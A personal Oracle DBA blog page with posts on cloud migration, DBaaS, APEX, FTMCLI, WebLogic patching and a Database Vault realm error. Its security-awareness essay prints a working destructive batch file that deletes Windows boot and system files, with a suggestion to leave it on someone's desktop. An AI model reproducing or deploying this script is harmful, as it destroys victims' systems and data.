Oracle Database Application Security Book

Finally …

The Book is alive

For the first time, a book that discusses critical security issues such as database threats and how to avoid them. The book also includes advanced topics about Oracle Internet Directory and Oracle Access Manager, and how to implement full-cycle single sign-on.

Focus on the security aspects of designing, building, and maintaining a secure Oracle Database application. Starting with data encryption, you will learn to work with transparent data, back-up, and networks. You will then go through the key principles of audits, where you will get to know more about identity preservation, policies and fine-grained audits. Moving on to virtual private databases, you’ll set up and configure a VPD to work in concert with other security features in Oracle, followed by tips on managing configuration drift, profiles, and default users.

What You Will Learn:- 

  • Work with Oracle Internet Directory using the command-line and the console.
  • Integrate Oracle Access Manager with different applications.
  • Work with the Oracle Identity Manager console and connectors, while creating your own custom one.
  • Troubleshooting issues with OID, OAM, and OID.
  • Dive deep into file system and network security concepts.
  • A first-of-its-kind chapter that covers most of the critical real-life database threats.

 

You can buy the book now from amazon here

 

Cheers

Osama

Migrating From AWS to Oracle Using SQL Developer

The data was uploaded to the cloud vendor Amazon Web Services (AWS), but the client decided to move their data on-premises. At first sight you will think this is hard and needs a lot of work, but thanks to SQL Developer and Jeff Smith, the product manager for SQL Developer (an amazing man, by the way, and a crossfitter at the same time) 😛

However, let's start:

  • Open SQL Developer.
  • Choose the Database Copy option from the Tools menu.
  • Select the source database, which should be AWS:
    • Provide the hostname only for AWS.
    • Listener port
    • DB name
    • Username/password
    • Test your connection.
  • Select the destination database, which should be Oracle:
    • Provide the hostname/IP for the server.
    • Listener port
    • DB name
    • Username/password
    • Test your connection.
  • Press the Next button. If the migration was done before on the same schema, press Replace and then Next.
  • Press Next after choosing what you want to move: data, functions, triggers, etc.
  • Check "Proceed to summary" and press the Finish button. The migration will start after this; it will take some time depending on the internet connection and data size.
    Enjoy the migration
    Osama Mustafa

    Access Dbaas monitor

    To access Oracle DBaaS Monitor when the HTTPS port is unblocked (I blogged about this before and how to enable it):

    • Open the Oracle Database Cloud Service console.
    • From the right panel of the service, choose Database services monitor and press on it.
    • A new screen will open:
      • Username –> dbaas_monitor
      • Password –> the same password you set when creating the DBaaS.
    Thank you 
    Osama Mustafa

    Access Apex On the Cloud Using DBaas

    Oracle Database Cloud Service includes Oracle Application Express, which you manage using the Oracle Application Express administration console. You access this administration console by going to the Oracle Application Express.

    To access the Apex application on the cloud:

    • From the DBaaS you want, press on the tool panel and choose Apex.
    • To use Apex you need to enable HTTPS on your cloud; to do this, go to compute services –> network and choose https.
    • After doing this you will be able to access the Apex page. Enter the following information:
      • In the Workspace box, enter INTERNAL.
      • In the Username box, enter ADMIN.
      • In the password box, enter your password.
    Enjoy the cloud
    Cheers
    Osama mustafa

    Delete Oracle Storage cloud Container using File Transfer Manager CLI – FTMCLI

    In this post I will show you how to delete a container together with all the objects in it. We are using a storage container to configure Oracle Cloud backup and store database backups in it. If you want to delete this container, Oracle Cloud will not allow it, because the container should be empty.

    There are different ways to do this, all of them using the command line. The ways are:

    • Web Console (works only if the container is empty)
    • RESTful API
    • Java Library
    • Oracle Storage Cloud File Transfer Manager CLI
    • File Transfer Manager API
    Each one of them has its own advantages and disadvantages; you can check the Oracle documentation for this from here.
    Let's talk about FTMCLI. It is very simple and easy to use. You should have JRE 7 or later, download from here,
    and download FTMCLI from here.
    • To keep it as simple as you can, put everything you download in one folder and extract it there.
    • Inside the FTMCLI zip file you will see a file called ftmcli.properties. This file allows you to save the storage name and configuration of the Storage Cloud; if you do this, it is not necessary to add them each time on the command line. I prefer to do this: doing it once is better than doing it each time. The file has different parameters, like this:
      • auth-url :- URL of your Oracle Storage Cloud
      • user :- Your user name.
      • service :- The cloud service name.
      • identity-domain :- The name of your identity domain.
      • storage-class :- default standard, or you can change it to archive
      • max-threads :- The maximum number of threads to be used in a request.
      • retries :-  The number of times that a request must be retried in case of failure.
      • segment-size :- The segment size in MB.
      • segments-container :- The container in which the segments must be stored during the upload process.
                You can get all the information from the console –> Storage cloud –> Details.
    • Now let's use the command line. On your PC open cmd or ssh, depending on your operating system. If you have Linux, you need to export the following (check the documentation here):
      • export FTM_AUTH_URL
      • export FTM_USER
      • export FTM_SERVICE
      • export FTM_IDOMAIN
    • Using the command java.exe -jar ftmcli.jar --help you can see how to use FTMCLI.
    • My container on Oracle Storage Cloud is called DBBackup, so I want to delete it with the command below:

    c:\FTMCL\bin>java.exe -jar C:\FTMCL\ftmcli.jar delete -f DBBackup --properties-file c:\FTMCL\ftmcli.properties

    The output should be like this :-

    Cheers And Enjoy the cloud.
    Osama Mustafa

    Apply Weblogic Patch Offline mode

    1. Shut down all the WebLogic services.
    2. Unzip the patch under $MW_HOME/utils/bsu/cache_dir
    3. Run the following command:

    ./bsu.sh -prod_dir=$weblogic_home  -patch_download_dir=Patch_location -patchlist=patch_id -verbose -install

    The final Result 

    Or you can apply the WebLogic patch using Smart Update.

    Thanks
    Osama Mustafa

    Latest Video Upload Part #1

    Recently I was working on some installations and configurations for Fusion, and as you can see the videos are uploaded to my channel:

    1- ODI 11.1.1.9 Installation here
    2- Oracle Enterprise manager 13c installation here
    3- Oracle BI 11.1.1.9 Installation On Linux here
    4- Install Oracle BI Apps 11.1.1.10.1 On Linux here

    Thanks
    Osama

    Me, Security & Oracle

    A lot of questions come to my mind when I start talking about Oracle security: how do I secure my databases, and what should I do?
    Is adding a firewall to my network enough? Will enabling the Oracle audit parameter be enough?
    Understanding security as a concept is very important to reduce the risk of attack, and to do that you should make your system secure.
    Having security awareness is the first step to securing the system.

    According to RSA reports, there was a 7% increase in the number of phishing attacks worldwide between the months of July and August 2010. The United States currently leads as the country that suffered the most attacks in regard to online cyber threats, with 35% of these aimed at citizens of the US; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
    The graph below shows the number of network security breaches over the past 12 months (graph made by Ponemon Institute).
    In addition to the above reports, $1 trillion is the total value of intellectual property hackers stole from businesses around the world in 2008.
    As proof of this, I will mention three different stories of the top "black hat" hackers.
    The graph below shows how much cyber-attacks cost companies over 12 months (graph made by Ponemon Institute).
    Jonathan James was 16 years old when he hacked NASA, which made him the first juvenile sent to prison. He installed a backdoor into a Defense Threat Reduction Agency server and jacked into NASA computers, stealing software worth $1.7M and costing NASA $41,000 in repairs.
    Adrian Lamo hacked into the NY Times and Microsoft using coffee shop Wi-Fi, and viewed personal information and high-profile subject matter.
    The last example: Kevin Mitnick spent two years stealing corporate secrets and breaking into the US national defense warning system.
    Computer hacking is usually stereotyped in movies and cartoons as a guy sitting behind a desk with a Pepsi can and not much luck with the ladies. The truth is that this guy costs people and companies money and privacy; hacking therefore affects individuals, organizations and companies.
    Individual victims of computer hacking can lose their savings, their privacy, even their lives. In the early days of computers, the virus was the biggest security risk, causing data loss. After that it was replaced by malware, which is small software designed to do a job, such as a key logger or virus scanner, but now this software is no longer any fun since hackers are now creating malware.
    Nothing is easier today than writing a virus just to do annoying things; the code below is just an example of how a virus is written.
    You can find the steps to write a virus, Trojan or even a worm on the internet for free. This is what makes the problem bigger, because an internal user can read this information and start using it, so you should be prepared for all these kinds of attacks.
    Below is an example of a simple virus; all you have to do is save it as a batch file and put it on someone's desktop.

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini
    msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

    What if the victim is a company or organization? The small effect a hacker could cause is putting some employees out of work for a short period of time. The large effect is that a hacker could steal company secrets, cause the company to lose data, and do some damage. According to the last survey by Ponemon Research on behalf of Juniper Networks, 90% of companies had been breached at least once by hackers over the past 12 months. 60% reported two or more breaches over the past year.

    So companies or organizations should spend a small fortune on security software and hardware, and let us not forget to educate our employees.
    Security today is considered the most important priority for a company, for two reasons:
    1- Personal data protection.
    If you store data you should secure this data, since it relates to customers or clients.
    2- Social responsibility.

    Some of this data is very important and contains people's private information, which tells us that a company should protect this information by securing its systems.
    When you leave your house for work in the morning or to hang out with friends in the evening, you make sure that your house is secure. Why? All this is to keep unauthorized people from access, damage and theft, by enabling the alarm system and making sure your doors and even your windows are locked. It is the same for companies or organizations: the same principle but with a different approach. The valuable thing in computers and networks is the data you create; this is the first reason why we have computers and networks.
    An operating system can be reinstalled and hardware can be replaced, but we are talking about data, which is unique and sometimes irreplaceable.
    Data is confidential and concerns people's privacy. This is the main reason why you don't want to lose it, and you don't want others to even view it without authorization: Visa information, mobile numbers, social numbers and account numbers.
    If it's left unprotected then the information can be accessed by anyone. If this information falls into the wrong hands, your life is a nightmare. Quite often, ensuring your data is protected is a small price to pay to avoid future problems and prevent threats.
    What if the data is not adequately protected? Perhaps it is compromised, which is called a security breach. I am not talking here at the individual level but at the business level, where it causes problems such as loss of reputation and lawsuits.
    According to the Ponemon Institute, the cost of a security breach during 2008 was $202 per record breached. Imagine if you have 1 million records: what could it cost the company?
    Intruders do not care who you are or about your identity; they just want to control your computer. By doing this they can hide their location and start attacks.
    By getting access to the system, intruders discover new vulnerabilities to exploit in computer software. Don't forget it's a network, which means they can access other computers on the same network. Complex, right?
    But what about the law? All the above information is just reports and security principles; check the law below that talks about security and data privacy.
    Cheers
    Osama Mustafa

    ORA-47401: Realm violation for CREATE TABLE on SYSTEM.SYS_EXPORT_SCHEMA_07

    When trying to export any user using SYSTEM, the error below appeared:

    Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
    With the Partitioning, Real Application Clusters, Automatic Storage Management, Oracle Label Security,
    OLAP, Data Mining, Oracle Database Vault and Real Application Testing optio
    ORA-31626: job does not exist
    ORA-31633: unable to create master table "SYSTEM.SYS_EXPORT_SCHEMA_07"
    ORA-06512: at "SYS.DBMS_SYS_ERROR", line 95
    ORA-06512: at "SYS.KUPV$FT", line 1020
    ORA-47401: Realm violation for CREATE TABLE on SYSTEM.SYS_EXPORT_SCHEMA_07

    The above error occurs because the SYSTEM user is not allowed to access the data dictionary objects protected by the Oracle Data Dictionary realm.

    Run the command below:
    SQL>
    BEGIN
    DVSYS.DBMS_MACADM.ADD_AUTH_TO_REALM(
    realm_name => 'Oracle Data Dictionary',
    grantee => 'SYSTEM');
    END;
    /
    PL/SQL procedure successfully completed.

    Or you can use the GUI in Database Vault and, under the Data Dictionary realm, add the SYSTEM user as a participant.
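
    An added example, not part of the original post: one way to keep this realm authorization limited to the export window, so SYSTEM does not stay authorized in the Oracle Data Dictionary realm afterwards. It assumes the session holds the DV_OWNER (or DV_ADMIN) role; the DBA_DV_REALM_AUTH queries, the explicit participant option and the DELETE_AUTH_FROM_REALM call are additions to what the post shows.

```sql
-- Added example: SYSTEM is authorized in the realm only while the export runs.
-- Assumes the session holds the DV_OWNER (or DV_ADMIN) role.

-- 1. Baseline: who is authorized in the realm before any change?
SELECT grantee, auth_options
  FROM dvsys.dba_dv_realm_auth
 WHERE realm_name = 'Oracle Data Dictionary'
 ORDER BY grantee;

-- 2. Authorize SYSTEM as a participant (not as realm owner), so it can use
--    its existing privileges on realm objects but cannot grant or revoke
--    privileges on realm-protected objects.
BEGIN
  DVSYS.DBMS_MACADM.ADD_AUTH_TO_REALM(
    realm_name   => 'Oracle Data Dictionary',
    grantee      => 'SYSTEM',
    auth_options => DVSYS.DBMS_MACUTL.G_REALM_AUTH_PARTICIPANT);
END;
/

-- 3. Run the Data Pump export from the operating system now.

-- 4. Remove the authorization as soon as the export has finished.
BEGIN
  DVSYS.DBMS_MACADM.DELETE_AUTH_FROM_REALM(
    realm_name => 'Oracle Data Dictionary',
    grantee    => 'SYSTEM');
END;
/

-- 5. Verify: returns no rows if SYSTEM was not authorized before step 2.
SELECT grantee, auth_options
  FROM dvsys.dba_dv_realm_auth
 WHERE realm_name = 'Oracle Data Dictionary'
   AND grantee = 'SYSTEM';
```

    Keeping the output of step 1 with the change record makes it easy to confirm later that the realm ended up in the same state it started in.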

    Thank you  

    Jordan Amman Oracle User Group

    It's almost here: 09/04/2015. I published before about the first event for JAOUG. I am so excited; organizing the event is not easy and needs a lot of work, commitment and dedication. Finally we are here.

    Since this is the first event before the biggest one, it's only an introduction to the group, to introduce the local people and let them know about the group.

    We prepared the poster today and it seems perfect.

    Thanks to the amazing volunteers and PSUT for making this dream come true.
    Osama Mustafa